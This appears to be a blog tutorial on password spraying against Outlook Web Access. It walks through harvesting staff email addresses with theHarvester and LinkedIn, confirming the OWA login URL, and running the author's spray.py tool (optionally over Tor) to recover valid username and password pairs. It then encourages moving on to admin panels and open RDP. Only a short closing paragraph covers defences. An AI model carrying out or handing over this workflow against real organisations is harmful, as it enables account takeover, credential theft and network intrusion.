Reverse brute force attack (or just Password Spraying) using OWAspray.py

Weak passwords are still a thing. I’ve been worried about this for a while. Weak passwords aren’t new and we should pay attention to this since a malicious person can go further from a compromised account. In only 5 minutes anybody can access to a network and move laterally once inside. As a Proof of Concept I published a simple Python script called OWAspray.py to test the top 10 worst passwords we possibly could find.

First, we’re going to collect some emails using theHarvester; theHarvester is a very simple, yet effective tool designed to be used in the early stages of a penetration test. Use it for open source intelligence gathering and determine a company’s external threat landscape on the internet. Let’s install it:

$ git clone https://github.com/laramies/theHarvester.git
$ cd theHarvester
$ virtualenv -p python3 venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Good. Now, let’s find some info:

$ python theHarvester.py -d DOMAIN -b all -l 200
...
[*] Emails found: X
----------------------
...
FIRSTNAMELASTNAME@DOMAIN
FIRSTNAMELASTNAME@DOMAIN
...
[*] Hosts found: Y
---------------------
...
mail.DOMAIN:IP
...

We’ll see a lot of information but right now we only want to collect the emails and the URL of the Outlook Web Application. In this case we have the next pattern: FIRSTNAME+LASTNAME@DOMAIN. Cool, now we can go to LinkedIn or their website to get more usernames. This tool looks pretty good linkedin2username, you can try it; I will be (probably) writing some script for this later. Now we have the email pattern we can write a list of usernames to test.

Let’s the magic begin…

OWAspray.py

Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. These attacks have become one of the favorite technique of attackers, as it has proved to be very effective for advancing through a network after having established a foothold inside. I wrote a script to test this, let’s try it:

$ git clone https://github.com/davidtavarez/owaspray
$ cd owaspray
$ virtualenv -p python2.7 venv
$ source venv/bin/activate
$ pip install -r requirements.txt
$ python spray.py --help

usage: spray.py [-h] -t TARGET -u USERNAME_FILE -p PASSWORD_FILE
                [--tor-host TOR_HOST] [--tor-port TOR_PORT]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL of the target.
  -u USERNAME_FILE, --username_file USERNAME_FILE
                        The list of users.
  -p PASSWORD_FILE, --password_file PASSWORD_FILE
                        The list of passwords to try.
  --tor-host TOR_HOST   Tor server.
  --tor-port TOR_PORT   Tor port server.

Now we can confirm the URL:

$ curl -L -I https://mail.DOMAIN/
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Location: https://mail.DOMAIN/owa/
...

HTTP/1.1 440 Login Timeout
Content-Length: 43
Content-Type: text/html; charset=utf-8
...
Connection: close
...

Good. Let’s hack this!

$ python spray.py -t https://mail.DOMAIN -u users.txt -p passwords.txt
[+] FIRSTNAMELASTNAME:PASSWORD
[+] FIRSTNAMELASTNAME:PASSWORD
...

:)

The important question is: how far can I go from here? Well, if you got an admin account, you can move to /ecp/ and have fun; also, find some open RDP will be fine I guess… what else? I don’t know, use your creativity!

What should we do to protect users?

It’s very simple: use better passwords, do not repeat passwords, enforce Two-Factor (2F) Authentication and create a max-attempt policy.